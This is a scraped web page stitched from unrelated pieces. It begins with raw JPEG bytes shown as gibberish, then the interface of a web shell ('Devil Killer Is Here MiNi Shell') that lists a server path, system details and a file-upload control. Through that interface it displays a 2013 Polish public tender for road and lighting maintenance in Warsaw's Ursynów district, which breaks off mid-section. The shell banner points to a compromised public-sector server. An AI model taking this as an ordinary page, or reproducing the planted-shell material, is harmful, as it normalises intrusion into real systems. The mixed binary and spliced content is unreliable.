JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130125/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130125/13903-N-2013.html

<p class="kh_header"><b>Warszawa: Utrzymanie, remont, konserwacja i naprawa wraz z oznakowaniem i modernizacją oświetlenia dróg gminnych oraz dróg będących we władaniu m.st. Warszawy znajdujących się na terenie Dzielnicy Ursynów</b><br>
<b>Numer ogłoszenia: 13903 - 2013; data zamieszczenia: 25.01.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto Stołeczne Warszawa Dzielnica Ursynów , al. Komisji Edukacji Narodowej 61, 02-777 Warszawa, woj. mazowieckie, tel. 022 5457100, faks 022 5457291.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ursynow.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Utrzymanie, remont, konserwacja i naprawa wraz z oznakowaniem i modernizacją oświetlenia dróg gminnych oraz dróg będących we władaniu m.st. Warszawy znajdujących się na terenie Dzielnicy Ursynów.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zamawiający w przedmiotowym zamówieniu przewidział 2 niżej wymienione Części zwane dalej Części lub Zadania:

Nr Części zamówienia: I, Nazwa Części:Utrzymanie, remont, konserwacja, naprawa i modernizacja oświetlenia w drogach gminnych oraz drogach będących we władaniu m.st. Warszawy znajdujących się na terenie Dzielnicy Ursynów;
Nr Części zamówienia: II, Nazwa Części:Oznakowanie pionowe i poziome oraz urządzenia bezpieczeństwa ruchu drogowego w ramach utrzymania i wdrażanie projektów organizacji ruchu w drogach gminnych oraz drogach będących we władaniu m.st. Warszawy znajdujących się na terenie Dzielnicy Ursynów.

1. Dotyczy Części I zamówienia:
1.1. Zakres prac objętych zamówieniem w odniesieniu do Części I obejmuje:
1) Naprawy - roboty związane z usuwaniem awarii, a w szczególności likwidacją uszkodzeń oznakowania drogowego i nawierzchni drogowych zagrażających bezpieczeństwu ruchu kołowego lub pieszego;
2) Utrzymanie - roboty związane z bieżącym wykonywaniem prac zmierzających do zwiększenia bezpieczeństwa i wygody ruchu;
3) Konserwację - roboty związane z wykonywaniem napraw bieżących nawierzchni jezdni i chodników bez zmiany konstrukcji nawierzchni;
4) Remonty - roboty związane z wykonywaniem prac przywracających pierwotny stan drogi, także przy użyciu wyrobów budowlanych innych niż użyte w stanie pierwotnym.
1.2. Zakres rzeczowy robót objętych zamówieniem w odniesieniu do Części I obejmuje:
1.2.1. Konserwację i remonty cząstkowe ulic na terenie Dzielnicy Ursynów na całej szerokości pasa drogowego, a w szczególności wykonywanie robót w następujących zakresach:
1) Roboty ziemne:
a) roboty ziemne mechaniczne z odwiezieniem urobku;
2) Warstwy odsączające i podsypkowe i podbudowy:
a) warstwy podsypkowe cementowo - piaskowe;
b) podbudowy betonowe;
c) podbudowy z tłucznia kamiennego sortowanego;
3) Nawierzchnie dróg nieulepszone:
a) nawierzchnie gruntowe;
b) nawierzchnie żwirowe i z kruszywa kamiennego;
c) nawierzchnie tłuczniowe kamienne;
d) nawierzchnie brukowe;
e) nawierzchnie z płyt żelbetowych (MON);
f) nawierzchnie z płyt drogowych wielootworowych;
g) nawierzchnie z płyt drogowych o grubości 15 cm;
4) Nawierzchnie ulepszone:
a) nawierzchnie z mieszanek mineralno-bitumicznych grysowych;
b) nawierzchnie z mieszanek mastyksowo-grysowych (SMA);
c) nawierzchnie z kostki brukowej;
d) ułożenie geowłókniny, siatki wzmacniającej; 
5) Krawężniki i obrzeża:
a) krawężniki betonowe na podsypce cementowo-piaskowej na ławach z oporem;
b) obrzeża betonowe 30x8 cm na podsypce piaskowej;
6) Chodniki:
a) chodniki z kostki brukowej betonowej grubości 8 cm i 6 cm na podsypce piaskowej i cementowo-piaskowej;
b) chodniki z płyt betonowych 50x50x7 cm na podsypce piaskowej;
7) Roboty rozbiórkowe:
a)rozebranie i frezowanie nawierzchni z mas mineralno-bitumicznych z odwiezieniem gruzu;
b) rozebranie nawierzchni z płyt żelbetowych MON;
c) rozebranie nawierzchni z płyt drogowych wielootworowych;
d)rozebranie chodników z płyt betonowych i rozebranie nawierzchni z kostki brukowej z odwiezieniem gruzu;
e) rozebranie krawężników betonowych;
f) rozebranie obrzeży trawnikowych;
8) Remonty cząstkowe jezdni o nawierzchniach bitumicznych z odwiezieniem gruzu:
a) zabezpieczenie uszkodzonej nawierzchni;
b)remonty cząstkowe nawierzchni bitumicznych mieszanką mineralno-asfaltową;
9) Roboty naprawczo-konserwacyjne:
a) naprawy dróg gruntowych - profilowanie z zagęszczeniem;
b) ścinanie poboczy z odwiezieniem ziemi;
10) Urządzenia odwodnieniowe:
a) ułożenie rur drenarskich O 100 mm i O 300 mm;
b) odtworzenie rowów odparowalnych;
c) oczyszczenie studni chłonnych;
d) regulacja pionowa zaworów wodociągowych, gazowych, włazów kanałowych, kratek ściekowych ulicznych oraz studni teletechnicznych;
11)Opracowanie czasowej organizacji ruchu zwiazanej z remontem kapitalnym nawierzchni dróg;
12)Modernizacja, przebudowa oświetlenia ulicznego nastąpi na postawie projektu lub ustaleń przeprowadzonych w dniu wprowadzenia na budowę.
1.3. Sposób realizacji przedmiotu zamówienia w odniesieniu do Części I:
1) Do robót Wykonawca będzie przystępował po sporządzeniu i przekazaniu przez Zamawiającego protokołu wprowadzenia:
a) W protokole będzie określony zakres robót i termin wykonania. Po sporządzeniu protokołu wprowadzenia Wykonawca zobowiązany jest wykonać dokumentację zdjęciową danego obiektu;
b)Teren robót należy zabezpieczyć i oznakować, zgodnie z obowiązującymi przepisami;
c)Roboty należy prowadzić w sposób, który nie powoduje znacznych utrudnień w ruchu;
d) Wykonawca dokumentuje wykonanie poszczególnego etapu robót budowlanych poprzez wykonanie zdjęć;
e) Zamawiający przystąpi do odbioru prac nie później niż w ciągu 7 dni od daty zgłoszenia odbioru;
2) Rozliczenie prac zgłoszonych do odbioru nastąpi na podstawie:
a) Bezusterkowego protokołu odbioru;
b)Zaakceptowanych przez Zamawiającego obmiarów i kosztorysów powykonawczych wraz ze szkicem sytuacyjnym.
Przy powstawaniu nowych zrealizowanych inwestycji drogowych Wykonawca wykonuje dokumentację powykonawczą z naniesieniem na mapę zasadniczą miasta.
	
Powyższy opis określa treść załącznika nr 1 do wzoru umowy stanowiącego załącznik nr 6a) do SIWZ.

Szczegółowy opis przedmiotu zamówienia w odniesieniu do Części I określają wzór umowy stanowiący załącznik nr 6a) do SIWZ, wykaz dróg gminnych stanowiący załącznik nr 7a) do SIWZ oraz stanowiący równocześnie załącznik nr 4 do wzoru umowy, wykaz dróg wewnętrznych stanowiący załącznik nr 7b) do SIWZ oraz stanowiący równocześnie załącznik nr 5 do wzoru umowy, a także:
1.Dokumentacja projektowa: Przedmiar robót - stanowiący załącznik nr 5ab) do SIWZ;
2.Specyfikacja techniczna wykonania i odbioru robót - stanowiąca załącznik nr 5aa) do SIWZ oraz stanowiąca równocześnie załącznik nr 2 do wzoru umowy.

2. Dotyczy Części II zamówienia:
2.1. Zakres prac objętych zamówieniem w odniesieniu do Części II obejmuje:
1) Poprawę oznakowania pionowego i poziomego oraz urządzeń bezpieczeństwa ruchu;
2)Wdrażanie projektów organizacji ruchu;
2.2. Zakres rzeczowy robót objętych zamówieniem w odniesieniu do Części II obejmuje:
2.2.1. Poprawę oznakowania pionowego i poziomego oraz urządzeń bezpieczeństwa ruchu na terenie Dzielnicy Ursynów na całej szerokości pasa drogowego, a w szczególności wykonywanie robót w następujących zakresach:
1) Oznakowanie pionowe i poziome oraz urządzenia bezpieczeństwa ruchu drogowego:
a)odnawianie oznakowania poziomego jezdni farbą chlorokauczukową i chlorokauczukową z dodatkami mikrokulek szklanych;
b)wymiana oznakowania pionowego zniszczonych znaków drogowych, słupów do znaków drogowych, luster okrągłych i prostokątnych oraz słupów wygrodzeniowych, łańcuchów i pylonów oraz zapór;
c)prostowanie sztyc do znaków drogowych i słupów wygrodzeniowych;
d)naprawa i wykonywanie urządzeń bezpieczeństwa ruchu drogowego.
2)Wdrażanie projektów organizacji ruchu na terenie Dzielnicy Ursynów na całej szerokości pasa drogowego zgodnie z zatwierdzonymi projektami oraz ze szczegółowymi warunkami technicznymi dla znaków i sygnałów drogowych oraz urządzeń bezpieczeństwa ruchu drogowego i warunkami ich umieszczania na drogach określonymi w załącznikach od nr 1 do nr 4 do rozporządzenia Ministra Infrastruktury z dnia 3 lipca 2003 r. w sprawie szczegółowych warunków technicznych dla znaków i sygnałów drogowych oraz urządzeń bezpieczeństwa ruchu drogowego i warunków ich umieszczania na drogach (Dz.U. 2003, Nr 220, poz.2181 zał., z późn. zm.).
2.3. Sposób realizacji przedmiotu zamówienia w odniesieniu do Części II:
1) Do robót Wykonawca będzie przystępował po sporządzeniu i przekazaniu przez Zamawiającego protokołu wprowadzenia:
a) W protokole będzie określony zakres robót i termin wykonania;
b)Teren robót należy zabezpieczyć i oznakować, zgodnie z obowiązującymi przepisami;
c)Roboty należy prowadzić w sposób, który nie powoduje znacznych utrudnień w ruchu;
d) Zamawiający przystąpi do odbioru prac nie później niż w ciągu 7 dni od daty zgłoszenia odbioru;
2) Rozliczenie prac zgłoszonych do odbioru nastąpi na podstawie:
a) Bezusterkowego protokołu odbioru;
b)Zaakceptowanych przez Zamawiającego obmiarów i kosztorysów powykonawczych.

Powyższy opis określa treść załącznika nr 1 do wzoru umowy stanowiącego załącznik nr 6b) do SIWZ.

Szczegółowy opis przedmiotu zamówienia w odniesieniu do Części II określają wzór umowy stanowiący załącznik nr 6b) do SIWZ, wykaz dróg gminnych stanowiący załącznik nr 7a) do SIWZ oraz stanowiący równocześnie załącznik nr 4 do wzoru umowy, wykaz dróg wewnętrznych stanowiący załącznik nr 7b) do SIWZ oraz stanowiący równocześnie załącznik nr 5 do wzoru umowy, a także:
1.Dokumentacja projektowa: Przedmiar robót - stanowiący załącznik nr 5bb) do SIWZ;
2.Specyfikacja techniczna wykonania i odbioru robót - stanowiąca załącznik nr 5ba) do SIWZ oraz stanowiąca równocześnie załącznik nr 2 do wzoru umowy.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>1. Dotyczy Części I zamówienia: 
Zamawiający przewiduje możliwość udzielenia zamówień uzupełniających, o których mowa w art. 67 ust. 1 pkt 6) ustawy Prawo zamówień publicznych, o łącznej wartości do 50% wartości zamówienia podstawowego w odniesieniu do Części I. Zamówienia uzupełniające polegać będą na wykonaniu: robót drogowych, robót w zakresie odwodnienia i robót oświetleniowych - dróg gminnych oraz dróg będących we władaniu m.st. Warszawy znajdujących się na terenie Dzielnicy Ursynów i będą powtórzeniem tego samego rodzaju robót, zgodnych z przedmiotem zamówienia podstawowego w odniesieniu do Części I.
2. Dotyczy Części II zamówienia: 
Zamawiający przewiduje możliwość udzielenia zamówień uzupełniających, o których mowa w art. 67 ust. 1 pkt 6) ustawy Prawo zamówień publicznych, o łącznej wartości do 50% wartości zamówienia podstawowego w odniesieniu do Części II. Zamówienia uzupełniające polegać będą na: wykonaniu robót drogowych, robót w zakresie regulacji ruchu i wdrożeniu  projektów organizacji ruchu - dróg gminnych oraz dróg będących we władaniu m.st. Warszawy znajdujących się na terenie Dzielnicy Ursynów i będą powtórzeniem tego samego rodzaju robót, zgodnych z przedmiotem zamówienia podstawowego w odniesieniu do Części II</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.40-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 10.12.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.Oferta musi być zabezpieczona wadium w wysokości:
a) Dotyczy Części I - 100 000,00 złotych  (słownie: sto tysięcy złotych 00/100 groszy);
b) Dotyczy Części II - 10 000,00 złotych  (słownie: dziesięć tysięcy złotych 00/100 groszy).
2.Wymagania dotyczące wnoszenia wadium:
Wadium wniesione w formach określonych w ppkt od 19.2.2. do 19.2.5 SIWZ - musi zawierać zobowiązanie, zgodne z art.46 ust.4a i ust.5 ustawy Prawo zamówień publicznych:
Zamawiający zatrzymuje wadium:
1. jeżeli Wykonawca w odpowiedzi na wezwanie, o którym mowa w art.26 ust.3, nie złożył dokumentów lub oświadczeń, o których mowa w art.25 ust.1, lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nieleżących po jego stronie;
2. jeżeli Wykonawca, którego oferta została wybrana:
1) odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie;
2) nie wniósł wymaganego zabezpieczenia należytego wykonania umowy;
3) zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy.
Ponadto w odniesieniu do gwarancji wadialnych, zastrzega się, iż z ich treści musi wynikać, że ma ona charakter bezwarunkowy, nieodwołalny, a suma gwarancyjna płatna jest na pierwsze żądanie.
3. Pozostałe wymagania dotyczące wnoszenia wadium określone zostały w pkt 19 SIWZ</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie dotyczy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. Dotyczy Części I zamówienia:
Wykonawca wykaże, że w okresie ostatnich 5 lat przed upływem terminu składania ofert w postępowaniu (a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie) wykonał1 (tj. zakończył) co najmniej jedną robotę budowlaną polegającą min. na:
a)remoncie2, konserwacji3, naprawie4, budowie5 lub przebudowie6 - drogi/dróg o nawierzchni ulepszonej bitumicznej i łącznej powierzchni nie mniejszej niż 5 000m2;
oraz
b)wykonaniu7 nawierzchni z kostki betonowej o łącznej powierzchni nie mniejszej niż 4 000m2; 
oraz
c)wykonaniu8, modernizacji9 lub przebudowie10 oświetlenia ulicznego.
UWAGA!
1  Za wykonaną robotę Zamawiający uzna taką robotę, którą Wykonawca wykonał w ramach jednej umowy i której przedmiot został odebrany przez Zamawiającego jako wykonany zgodnie z zasadami sztuki budowlanej i prawidłowo ukończony.
2 Pod pojęciem remont należy rozumieć wykonywanie robót przywracających stan pierwotny drogi, a niestanowiących bieżącej konserwacji;
3 Pod pojęciem konserwacja należy rozumieć naprawy bieżące dróg bez zmiany konstrukcji nawierzchni;
4 Pod pojęciem naprawy należy rozumieć usuwanie awarii (likwidacja uszkodzeń oznakowania drogowego i nawierzchni drogowych zagrażających bezpieczeństwu ruchu kołowego lub pieszego);
5 Pod pojęciem budowy należy rozumieć wykonywanie nowej drogi w określonym miejscu, a także odbudowę, rozbudowę, nadbudowę drogi;
6 Pod pojęciem przebudowy należy rozumieć zmianę już istniejącej drogi, nie powodującej jednak powstania nowej jej części;
7 Pod pojęciem wykonania nawierzchni z kostki betonowej należy rozumieć wykonanie nowej nawierzchni z kostki betonowej;
8 Pod pojęciem wykonania oświetlenia ulicznego należy rozumieć wykonanie nowego oświetlenia ulicznego;
9 Pod pojęciem modernizacji oświetlenia ulicznego należy rozumieć wykonanie robót polegających na odtworzeniu stanu pierwotnego oświetlenia ulicznego;
10 Pod pojęciem przebudowy oświetlenia ulicznego należy rozumieć zmianę już istniejącego oświetlenia ulicznego, nie powodującej jednak powstania nowej jego części;
2. Dotyczy Części II zamówienia:
Wykonawca wykaże, że w okresie ostatnich 5 lat przed upływem terminu składania ofert w postępowaniu (a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie) wykonał1 (tj. zakończył) co najmniej jedną robotę budowlaną polegającą min. na:
a)ustawieniu znaku/ów pionowego/ych;
oraz
b)wykonaniu2 lub odnowieniu oznakowania poziomego.
UWAGA!
1  Za wykonaną robotę Zamawiający uzna taką robotę, którą Wykonawca wykonał w ramach jednej umowy i której przedmiot został odebrany przez Zamawiającego jako wykonany zgodnie z zasadami sztuki budowlanej i prawidłowo ukończony.
2 Pod pojęciem wykonania oznakowania poziomego należy rozumieć wykonanie nowego oznakowania poziomego.

Ocena spełniania warunku udziału w postępowaniu dokonana zostanie w systemie 1 lub 0, zgodnie z formułą spełnia-nie spełnia w oparciu o informacje zawarte w oświadczeniu oraz dokumentach wyszczególnionych w sekcji III. pkt 4.1) Ogłoszenia. Z treści załączonego oświadczenia oraz dokumentów musi wynikać jednoznacznie, iż w/w warunek Wykonawca spełnił</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie dotyczy</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. Dotyczy Części I zamówienia:
Wykonawca dysponuje co najmniej jedną osobą: 
a)wyznaczoną do sprawowania funkcji kierownika robót, posiadającą uprawnienia budowlane bez ograniczeń w specjalności drogowej lub odpowiednie wydane na podstawie wcześniej obowiązujących przepisów lub odpowiednie wydane obywatelom innych Państw, z zastrzeżeniem art.12a. ustawy z dnia 7 lipca 1994 r. Prawo budowlane (tekst jednolity - Dz.U. z 2010 r., nr 243, poz.1623 z późn.zm.) i wpisaną na listę członków właściwej Izby Samorządu Zawodowego w rozumieniu ustawy z dnia 15 grudnia 2000r. o Samorządach Zawodowych Architektów, Inżynierów Budownictwa oraz Urbanistów (tekst jednolity - Dz. U. z 2001 r., Nr 5, poz. 42 z późn. zm.).
oraz
b)wyznaczoną do sprawowania funkcji kierownika robót elektrycznych, posiadającą uprawnienia budowlane bez ograniczeń w specjalności instalacyjnej w zakresie sieci i instalacji elektrycznych lub odpowiednie wydane na podstawie wcześniej obowiązujących przepisów lub odpowiednie wydane obywatelom innych Państw, z zastrzeżeniem art.12a. ustawy z dnia 7 lipca 1994 r. Prawo budowlane (tekst jednolity - Dz.U. z 2010 r., nr 243, poz.1623 z późn.zm.) i wpisaną na listę członków właściwej Izby Samorządu Zawodowego w rozumieniu ustawy z dnia 15 grudnia 2000r. o Samorządach Zawodowych Architektów, Inżynierów Budownictwa oraz Urbanistów (tekst jednolity - Dz. U. z 2001 r., Nr 5, poz. 42 z późn. zm.).
2. Dotyczy Części II zamówienia:
Wykonawca dysponuje co najmniej jedną osobą: 
a)wyznaczoną do sprawowania funkcji kierownika robót, posiadającą uprawnienia budowlane bez ograniczeń w specjalności drogowej lub odpowiednie wydane na podstawie wcześniej obowiązujących przepisów lub odpowiednie wydane obywatelom innych Państw, z zastrzeżeniem art.12a. ustawy z dnia 7 lipca 1994 r. Prawo budowlane (tekst jednolity - Dz.U. z 2010 r., nr 243, poz.1623 z późn.zm.) i wpisaną na listę członków właściwej Izby Samorządu Zawodowego w rozumieniu ustawy z dnia 15 grudnia 2000r. o Samorządach Zawodowych Architektów, Inżynierów Budownictwa oraz Urbanistów (tekst jednolity - Dz. U. z 2001 r., Nr 5, poz. 42 z późn. zm.).
UWAGA!
W przypadku, gdy Wykonawca będzie składał ofertę na więcej niż na jedną Część w odniesieniu do sekcji III. pkt 3.4) ppkt 1. lit. a) Ogłoszenia (dotyczy Części I zamówienia) oraz w odniesieniu do sekcji III. pkt 3.4) pppk 2. lit. a) Ogłoszenia (dotyczy Części II zamówienia), za wystarczające uzna się jednokrotne wykazanie osobą, o której mowa w ww. punktach, tj. jeżeli Wykonawca składa ofertę na Część I i II zamówienia to wykazując, iż dysponuje co najmniej jedną osobą wyznaczoną do sprawowania funkcji kierownika robót, posiadającą uprawnienia budowlane bez ograniczeń w specjalności drogowej lub odpowiednie wydane na podstawie wcześniej obowiązujących przepisów lub odpowiednie wydane obywatelom innych Państw, z zastrzeżeniem art.12a. ustawy z dnia 7 lipca 1994 r. Prawo budowlane (tekst jednolity - Dz.U. z 2010 r., nr 243, poz.1623 z późn.zm.) i wpisaną na listę członków właściwej Izby Samorządu Zawodowego w rozumieniu ustawy z dnia 15 grudnia 2000r. o Samorządach Zawodowych Architektów, Inżynierów Budownictwa oraz Urbanistów (tekst jednolity - Dz. U. z 2001 r., Nr 5, poz. 42 z późn. zm.) - spełni warunek opisany w sekcji III. pkt 3.4) pppk 1. lit. a) Ogłoszenia (dotyczy Części I zamówienia) oraz w sekcji III. pkt 3.4) pppk 2. lit. a) Ogłoszenia (dotyczy Części II zamówienia).

Ocena spełniania warunku udziału w postępowaniu dokonana zostanie w systemie 1 lub 0, zgodnie z formułą spełnia-nie spełnia w oparciu o informacje zawarte w oświadczeniu wyszczególnionym w sekcji III pkt 4.1) Ogłoszenia. Z treści załączonego oświadczenia musi wynikać jednoznacznie, iż w/w warunek Wykonawca spełnił</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie dotyczy</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

